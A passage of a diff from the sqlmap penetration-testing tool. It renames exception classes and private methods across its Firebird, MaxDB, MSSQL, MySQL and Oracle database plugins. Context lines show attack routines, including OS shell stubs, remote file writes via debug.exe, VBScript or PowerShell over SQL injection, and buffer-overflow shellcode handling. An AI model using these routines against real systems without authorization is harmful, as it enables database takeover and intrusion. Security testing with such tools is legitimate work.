self.connector.commit() self.connector.commit()

6
plugins/dbms/firebird/filesystem.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
@ -14,8 +14,8 @@ class Filesystem(GenericFilesystem):
def readFile(self, rFile): def readFile(self, rFile):
errMsg = "on Firebird it is not possible to read files" errMsg = "on Firebird it is not possible to read files"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def writeFile(self, wFile, dFile, fileType=None): def writeFile(self, wFile, dFile, fileType=None):
errMsg = "on Firebird it is not possible to write files" errMsg = "on Firebird it is not possible to write files"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg

8
plugins/dbms/firebird/fingerprint.py
View File

@ -47,7 +47,7 @@ class Fingerprint(GenericFingerprint):
value += actVer value += actVer
return value return value
actVer = Format.getDbms() + " (%s)" % (self.__dialectCheck()) actVer = Format.getDbms() + " (%s)" % (self._dialectCheck())
blank = " " * 15 blank = " " * 15
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
@ -67,7 +67,7 @@ class Fingerprint(GenericFingerprint):
return value return value
def __sysTablesCheck(self): def _sysTablesCheck(self):
retVal = None retVal = None
table = ( table = (
("1.0", ["EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)"]), ("1.0", ["EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)"]),
@ -93,7 +93,7 @@ class Fingerprint(GenericFingerprint):
return retVal return retVal
def __dialectCheck(self): def _dialectCheck(self):
retVal = None retVal = None
if Backend.getIdentifiedDbms(): if Backend.getIdentifiedDbms():
@ -141,7 +141,7 @@ class Fingerprint(GenericFingerprint):
infoMsg = "actively fingerprinting %s" % DBMS.FIREBIRD infoMsg = "actively fingerprinting %s" % DBMS.FIREBIRD
logger.info(infoMsg) logger.info(infoMsg)
version = self.__sysTablesCheck() version = self._sysTablesCheck()
if version is not None: if version is not None:
Backend.setVersion(version) Backend.setVersion(version)

6
plugins/dbms/firebird/syntax.py
View File

@ -6,7 +6,7 @@ See the file 'doc/COPYING' for copying permission
""" """
from lib.core.common import isDBMSVersionAtLeast from lib.core.common import isDBMSVersionAtLeast
from lib.core.exception import sqlmapSyntaxException from lib.core.exception import SqlmapSyntaxException
from plugins.generic.syntax import Syntax as GenericSyntax from plugins.generic.syntax import Syntax as GenericSyntax
class Syntax(GenericSyntax): class Syntax(GenericSyntax):
@ -26,7 +26,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex:].find("'") index = expression[firstIndex:].find("'")
if index == -1: if index == -1:
raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression raise SqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
lastIndex = firstIndex + index lastIndex = firstIndex + index
old = "'%s'" % expression[firstIndex:lastIndex] old = "'%s'" % expression[firstIndex:lastIndex]
@ -58,7 +58,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex:].find(")") index = expression[firstIndex:].find(")")
if index == -1: if index == -1:
raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression raise SqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
lastIndex = firstIndex + index + 1 lastIndex = firstIndex + index + 1
old = expression[firstIndex:lastIndex] old = expression[firstIndex:lastIndex]

10
plugins/dbms/firebird/takeover.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.takeover import Takeover as GenericTakeover from plugins.generic.takeover import Takeover as GenericTakeover
class Takeover(GenericTakeover): class Takeover(GenericTakeover):
@ -14,18 +14,18 @@ class Takeover(GenericTakeover):
def osCmd(self): def osCmd(self):
errMsg = "on Firebird it is not possible to execute commands" errMsg = "on Firebird it is not possible to execute commands"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osShell(self): def osShell(self):
errMsg = "on Firebird it is not possible to execute commands" errMsg = "on Firebird it is not possible to execute commands"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osPwn(self): def osPwn(self):
errMsg = "on Firebird it is not possible to establish an " errMsg = "on Firebird it is not possible to establish an "
errMsg += "out-of-band connection" errMsg += "out-of-band connection"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osSmb(self): def osSmb(self):
errMsg = "on Firebird it is not possible to establish an " errMsg = "on Firebird it is not possible to establish an "
errMsg += "out-of-band connection" errMsg += "out-of-band connection"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg

4
plugins/dbms/maxdb/connector.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.connector import Connector as GenericConnector from plugins.generic.connector import Connector as GenericConnector
class Connector(GenericConnector): class Connector(GenericConnector):
@ -15,4 +15,4 @@ class Connector(GenericConnector):
def connect(self): def connect(self):
errMsg = "on SAP MaxDB it is not possible to establish a " errMsg = "on SAP MaxDB it is not possible to establish a "
errMsg += "direct connection" errMsg += "direct connection"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg

8
plugins/dbms/maxdb/enumeration.py
View File

@ -13,8 +13,8 @@ from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.data import queries from lib.core.data import queries
from lib.core.exception import sqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import CURRENT_DB from lib.core.settings import CURRENT_DB
from lib.utils.pivotdumptable import pivotDumpTable from lib.utils.pivotdumptable import pivotDumpTable
from plugins.generic.enumeration import Enumeration as GenericEnumeration from plugins.generic.enumeration import Enumeration as GenericEnumeration
@ -107,7 +107,7 @@ class Enumeration(GenericEnumeration):
if ',' in conf.db: if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating " errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns" errMsg += "the tables' columns"
raise sqlmapMissingMandatoryOptionException, errMsg raise SqlmapMissingMandatoryOptionException, errMsg
conf.db = safeSQLIdentificatorNaming(conf.db) conf.db = safeSQLIdentificatorNaming(conf.db)
@ -124,7 +124,7 @@ class Enumeration(GenericEnumeration):
else: else:
errMsg = "unable to retrieve the tables " errMsg = "unable to retrieve the tables "
errMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) errMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
raise sqlmapNoneDataException, errMsg raise SqlmapNoneDataException, errMsg
for tbl in tblList: for tbl in tblList:
tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)

6
plugins/dbms/maxdb/filesystem.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
@ -14,8 +14,8 @@ class Filesystem(GenericFilesystem):
def readFile(self, rFile): def readFile(self, rFile):
errMsg = "on SAP MaxDB reading of files is not supported" errMsg = "on SAP MaxDB reading of files is not supported"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def writeFile(self, wFile, dFile, fileType=None): def writeFile(self, wFile, dFile, fileType=None):
errMsg = "on SAP MaxDB writing of files is not supported" errMsg = "on SAP MaxDB writing of files is not supported"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg

4
plugins/dbms/maxdb/fingerprint.py
View File

@ -22,7 +22,7 @@ class Fingerprint(GenericFingerprint):
def __init__(self): def __init__(self):
GenericFingerprint.__init__(self, DBMS.MAXDB) GenericFingerprint.__init__(self, DBMS.MAXDB)
def __versionCheck(self): def _versionCheck(self):
infoMsg = "executing %s SYSINFO version check" % DBMS.MAXDB infoMsg = "executing %s SYSINFO version check" % DBMS.MAXDB
logger.info(infoMsg) logger.info(infoMsg)
@ -76,7 +76,7 @@ class Fingerprint(GenericFingerprint):
value += DBMS.MAXDB value += DBMS.MAXDB
return value return value
actVer = Format.getDbms() + " (%s)" % self.__versionCheck() actVer = Format.getDbms() + " (%s)" % self._versionCheck()
blank = " " * 15 blank = " " * 15
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer

10
plugins/dbms/maxdb/takeover.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.takeover import Takeover as GenericTakeover from plugins.generic.takeover import Takeover as GenericTakeover
class Takeover(GenericTakeover): class Takeover(GenericTakeover):
@ -14,18 +14,18 @@ class Takeover(GenericTakeover):
def osCmd(self): def osCmd(self):
errMsg = "on SAP MaxDB it is not possible to execute commands" errMsg = "on SAP MaxDB it is not possible to execute commands"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osShell(self): def osShell(self):
errMsg = "on SAP MaxDB it is not possible to execute commands" errMsg = "on SAP MaxDB it is not possible to execute commands"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osPwn(self): def osPwn(self):
errMsg = "on SAP MaxDB it is not possible to establish an " errMsg = "on SAP MaxDB it is not possible to establish an "
errMsg += "out-of-band connection" errMsg += "out-of-band connection"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osSmb(self): def osSmb(self):
errMsg = "on SAP MaxDB it is not possible to establish an " errMsg = "on SAP MaxDB it is not possible to establish an "
errMsg += "out-of-band connection" errMsg += "out-of-band connection"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg

6
plugins/dbms/mssqlserver/connector.py
View File

@ -16,7 +16,7 @@ import logging
from lib.core.convert import utf8encode from lib.core.convert import utf8encode
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector from plugins.generic.connector import Connector as GenericConnector
class Connector(GenericConnector): class Connector(GenericConnector):
@ -42,7 +42,7 @@ class Connector(GenericConnector):
try: try:
self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout)
except pymssql.OperationalError, msg: except pymssql.OperationalError, msg:
raise sqlmapConnectionException, msg raise SqlmapConnectionException, msg
self.setCursor() self.setCursor()
self.connected() self.connected()
@ -63,7 +63,7 @@ class Connector(GenericConnector):
except (pymssql.OperationalError, pymssql.ProgrammingError), msg: except (pymssql.OperationalError, pymssql.ProgrammingError), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " "))
except pymssql.InternalError, msg: except pymssql.InternalError, msg:
raise sqlmapConnectionException, msg raise SqlmapConnectionException, msg
return retVal return retVal

4
plugins/dbms/mssqlserver/enumeration.py
View File

@ -22,7 +22,7 @@ from lib.core.data import queries
from lib.core.enums import CHARSET_TYPE from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import CURRENT_DB from lib.core.settings import CURRENT_DB
from lib.request import inject from lib.request import inject
@ -150,7 +150,7 @@ class Enumeration(GenericEnumeration):
if not kb.data.cachedTables: if not kb.data.cachedTables:
errMsg = "unable to retrieve the tables for any database" errMsg = "unable to retrieve the tables for any database"
raise sqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg)
else: else:
for db, tables in kb.data.cachedTables.items(): for db, tables in kb.data.cachedTables.items():
kb.data.cachedTables[db] = sorted(tables) if tables else tables kb.data.cachedTables[db] = sorted(tables) if tables else tables

30
plugins/dbms/mssqlserver/filesystem.py
View File

@ -21,8 +21,8 @@ from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject from lib.request import inject
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
@ -31,7 +31,7 @@ class Filesystem(GenericFilesystem):
def __init__(self): def __init__(self):
GenericFilesystem.__init__(self) GenericFilesystem.__init__(self)
def __dataToScr(self, fileContent, chunkName): def _dataToScr(self, fileContent, chunkName):
fileLines = [] fileLines = []
fileSize = len(fileContent) fileSize = len(fileContent)
lineAddr = 0x100 lineAddr = 0x100
@ -62,10 +62,10 @@ class Filesystem(GenericFilesystem):
return fileLines return fileLines
def __updateDestChunk(self, fileContent, tmpPath): def _updateDestChunk(self, fileContent, tmpPath):
randScr = "tmpf%s.scr" % randomStr(lowercase=True) randScr = "tmpf%s.scr" % randomStr(lowercase=True)
chunkName = randomStr(lowercase=True) chunkName = randomStr(lowercase=True)
fileScrLines = self.__dataToScr(fileContent, chunkName) fileScrLines = self._dataToScr(fileContent, chunkName)
logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr)) logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr))
@ -147,7 +147,7 @@ class Filesystem(GenericFilesystem):
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
errMsg = "unable to retrieve the content of the " errMsg = "unable to retrieve the content of the "
errMsg += "file '%s'" % rFile errMsg += "file '%s'" % rFile
raise sqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg)
indexRange = getLimitRange(count) indexRange = getLimitRange(count)
@ -162,9 +162,9 @@ class Filesystem(GenericFilesystem):
def unionWriteFile(self, wFile, dFile, fileType): def unionWriteFile(self, wFile, dFile, fileType):
errMsg = "Microsoft SQL Server does not support file upload with " errMsg = "Microsoft SQL Server does not support file upload with "
errMsg += "UNION query SQL injection technique" errMsg += "UNION query SQL injection technique"
raise sqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
def __stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType): def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using PowerShell to write the %s file content " % fileType infoMsg = "using PowerShell to write the %s file content " % fileType
infoMsg += "to file '%s', please wait.." % dFile infoMsg += "to file '%s', please wait.." % dFile
logger.info(infoMsg) logger.info(infoMsg)
@ -191,7 +191,7 @@ class Filesystem(GenericFilesystem):
self.execCmd(complComm) self.execCmd(complComm)
def __stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType): def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType infoMsg = "using debug.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % dFile infoMsg += "file content to file '%s', please wait.." % dFile
logger.info(infoMsg) logger.info(infoMsg)
@ -202,7 +202,7 @@ class Filesystem(GenericFilesystem):
debugSize = 0xFF00 debugSize = 0xFF00
if wFileSize < debugSize: if wFileSize < debugSize:
chunkName = self.__updateDestChunk(wFileContent, tmpPath) chunkName = self._updateDestChunk(wFileContent, tmpPath)
debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType) debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile) debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile)
@ -222,7 +222,7 @@ class Filesystem(GenericFilesystem):
for i in xrange(0, wFileSize, debugSize): for i in xrange(0, wFileSize, debugSize):
wFileChunk = wFileContent[i:i + debugSize] wFileChunk = wFileContent[i:i + debugSize]
chunkName = self.__updateDestChunk(wFileChunk, tmpPath) chunkName = self._updateDestChunk(wFileChunk, tmpPath)
if i == 0: if i == 0:
debugMsg = "renaming chunk " debugMsg = "renaming chunk "
@ -246,7 +246,7 @@ class Filesystem(GenericFilesystem):
self.execCmd(complComm) self.execCmd(complComm)
def __stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using a custom visual basic script to write the " infoMsg = "using a custom visual basic script to write the "
infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile) infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile)
logger.info(infoMsg) logger.info(infoMsg)
@ -341,7 +341,7 @@ class Filesystem(GenericFilesystem):
wFileContent = wFilePointer.read() wFileContent = wFilePointer.read()
wFilePointer.close() wFilePointer.close()
self.__stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType) self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
sameFile = self.askCheckWrittenFile(wFile, dFile, fileType) sameFile = self.askCheckWrittenFile(wFile, dFile, fileType)
@ -351,5 +351,5 @@ class Filesystem(GenericFilesystem):
choice = readInput(message, default="Y") choice = readInput(message, default="Y")
if not choice or choice.lower() == "y": if not choice or choice.lower() == "y":
self.__stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType) self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
#self.__stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType) #self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType)

6
plugins/dbms/mssqlserver/syntax.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapSyntaxException from lib.core.exception import SqlmapSyntaxException
from plugins.generic.syntax import Syntax as GenericSyntax from plugins.generic.syntax import Syntax as GenericSyntax
class Syntax(GenericSyntax): class Syntax(GenericSyntax):
@ -24,7 +24,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex:].find("'") index = expression[firstIndex:].find("'")
if index == -1: if index == -1:
raise sqlmapSyntaxException("Unenclosed ' in '%s'" % expression) raise SqlmapSyntaxException("Unenclosed ' in '%s'" % expression)
lastIndex = firstIndex + index lastIndex = firstIndex + index
old = "'%s'" % expression[firstIndex:lastIndex] old = "'%s'" % expression[firstIndex:lastIndex]
@ -48,7 +48,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex:].find(")") index = expression[firstIndex:].find(")")
if index == -1: if index == -1:
raise sqlmapSyntaxException("Unenclosed ) in '%s'" % expression) raise SqlmapSyntaxException("Unenclosed ) in '%s'" % expression)
lastIndex = firstIndex + index + 1 lastIndex = firstIndex + index + 1
old = expression[firstIndex:lastIndex] old = expression[firstIndex:lastIndex]

4
plugins/dbms/mssqlserver/takeover.py
View File

@ -9,7 +9,7 @@ import binascii
from lib.core.common import Backend from lib.core.common import Backend
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject from lib.request import inject
from plugins.generic.takeover import Takeover as GenericTakeover from plugins.generic.takeover import Takeover as GenericTakeover
@ -62,7 +62,7 @@ class Takeover(GenericTakeover):
errMsg += "overflow because it does not have a valid return " errMsg += "overflow because it does not have a valid return "
errMsg += "code for the underlying operating system (Windows " errMsg += "code for the underlying operating system (Windows "
errMsg += "%s Service Pack %d)" % (Backend.getOsVersion(), Backend.getOsServicePack()) errMsg += "%s Service Pack %d)" % (Backend.getOsVersion(), Backend.getOsServicePack())
raise sqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
shellcodeChar = "" shellcodeChar = ""
hexStr = binascii.hexlify(self.shellcodeString[:-1]) hexStr = binascii.hexlify(self.shellcodeString[:-1])

6
plugins/dbms/mysql/connector.py
View File

@ -14,7 +14,7 @@ import logging
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector from plugins.generic.connector import Connector as GenericConnector
class Connector(GenericConnector): class Connector(GenericConnector):
@ -37,7 +37,7 @@ class Connector(GenericConnector):
try: try:
self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)
except (pymysql.OperationalError, pymysql.InternalError), msg: except (pymysql.OperationalError, pymysql.InternalError), msg:
raise sqlmapConnectionException, msg[1] raise SqlmapConnectionException, msg[1]
self.setCursor() self.setCursor()
self.connected() self.connected()
@ -58,7 +58,7 @@ class Connector(GenericConnector):
except (pymysql.OperationalError, pymysql.ProgrammingError), msg: except (pymysql.OperationalError, pymysql.ProgrammingError), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
except pymysql.InternalError, msg: except pymysql.InternalError, msg:
raise sqlmapConnectionException, msg[1] raise SqlmapConnectionException, msg[1]
self.connector.commit() self.connector.commit()

4
plugins/dbms/mysql/filesystem.py
View File

@ -16,7 +16,7 @@ from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE from lib.core.enums import PLACE
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.request import inject from lib.request import inject
from lib.techniques.union.use import unionUse from lib.techniques.union.use import unionUse
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
@ -63,7 +63,7 @@ class Filesystem(GenericFilesystem):
logger.warn(warnMsg) logger.warn(warnMsg)
result = self.nonStackedReadFile(rFile) result = self.nonStackedReadFile(rFile)
else: else:
raise sqlmapNoneDataException, warnMsg raise SqlmapNoneDataException, warnMsg
else: else:
length = int(length) length = int(length)
sustrLen = 1024 sustrLen = 1024

4
plugins/dbms/mysql/fingerprint.py
View File

@ -26,7 +26,7 @@ class Fingerprint(GenericFingerprint):
def __init__(self): def __init__(self):
GenericFingerprint.__init__(self, DBMS.MYSQL) GenericFingerprint.__init__(self, DBMS.MYSQL)
def __commentCheck(self): def _commentCheck(self):
infoMsg = "executing %s comment injection fingerprint" % DBMS.MYSQL infoMsg = "executing %s comment injection fingerprint" % DBMS.MYSQL
logger.info(infoMsg) logger.info(infoMsg)
@ -111,7 +111,7 @@ class Fingerprint(GenericFingerprint):
value += actVer value += actVer
return value return value
comVer = self.__commentCheck() comVer = self._commentCheck()
blank = " " * 15 blank = " " * 15
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer

4
plugins/dbms/mysql/syntax.py
View File

@ -9,7 +9,7 @@ import binascii
import re import re
from lib.core.convert import utf8encode from lib.core.convert import utf8encode
from lib.core.exception import sqlmapSyntaxException from lib.core.exception import SqlmapSyntaxException
from plugins.generic.syntax import Syntax as GenericSyntax from plugins.generic.syntax import Syntax as GenericSyntax
class Syntax(GenericSyntax): class Syntax(GenericSyntax):
@ -41,7 +41,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex:].find(")") index = expression[firstIndex:].find(")")
if index == -1: if index == -1:
raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression raise SqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
lastIndex = firstIndex + index + 1 lastIndex = firstIndex + index + 1
old = expression[firstIndex:lastIndex] old = expression[firstIndex:lastIndex]

6
plugins/dbms/oracle/connector.py
View File

@ -16,7 +16,7 @@ import os
from lib.core.convert import utf8encode from lib.core.convert import utf8encode
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector from plugins.generic.connector import Connector as GenericConnector
os.environ["NLS_LANG"] = ".AL32UTF8" os.environ["NLS_LANG"] = ".AL32UTF8"
@ -46,7 +46,7 @@ class Connector(GenericConnector):
try: try:
self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password) self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password)
except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError), msg: except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError), msg:
raise sqlmapConnectionException, msg raise SqlmapConnectionException, msg
self.setCursor() self.setCursor()
self.connected() self.connected()
@ -67,7 +67,7 @@ class Connector(GenericConnector):
except (cx_Oracle.DatabaseError), msg: except (cx_Oracle.DatabaseError), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg) logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg)
except cx_Oracle.InternalError, msg: except cx_Oracle.InternalError, msg:
raise sqlmapConnectionException, msg raise SqlmapConnectionException, msg
self.connector.commit() self.connector.commit()

4
plugins/dbms/oracle/enumeration.py
View File

@ -19,7 +19,7 @@ from lib.core.data import queries
from lib.core.enums import CHARSET_TYPE from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.request import inject from lib.request import inject
from plugins.generic.enumeration import Enumeration as GenericEnumeration from plugins.generic.enumeration import Enumeration as GenericEnumeration
@ -160,6 +160,6 @@ class Enumeration(GenericEnumeration):
if not kb.data.cachedUsersRoles: if not kb.data.cachedUsersRoles:
errMsg = "unable to retrieve the roles " errMsg = "unable to retrieve the roles "
errMsg += "for the database users" errMsg += "for the database users"
raise sqlmapNoneDataException, errMsg raise SqlmapNoneDataException, errMsg
return kb.data.cachedUsersRoles, areAdmins return kb.data.cachedUsersRoles, areAdmins

6
plugins/dbms/oracle/filesystem.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
@ -15,9 +15,9 @@ class Filesystem(GenericFilesystem):
def readFile(self, rFile): def readFile(self, rFile):
errMsg = "File system read access not yet implemented for " errMsg = "File system read access not yet implemented for "
errMsg += "Oracle" errMsg += "Oracle"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def writeFile(self, wFile, dFile, fileType=None): def writeFile(self, wFile, dFile, fileType=None):
errMsg = "File system write access not yet implemented for " errMsg = "File system write access not yet implemented for "
errMsg += "Oracle" errMsg += "Oracle"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg

6
plugins/dbms/oracle/syntax.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapSyntaxException from lib.core.exception import SqlmapSyntaxException
from plugins.generic.syntax import Syntax as GenericSyntax from plugins.generic.syntax import Syntax as GenericSyntax
class Syntax(GenericSyntax): class Syntax(GenericSyntax):
@ -24,7 +24,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex:].find("'") index = expression[firstIndex:].find("'")
if index == -1: if index == -1:
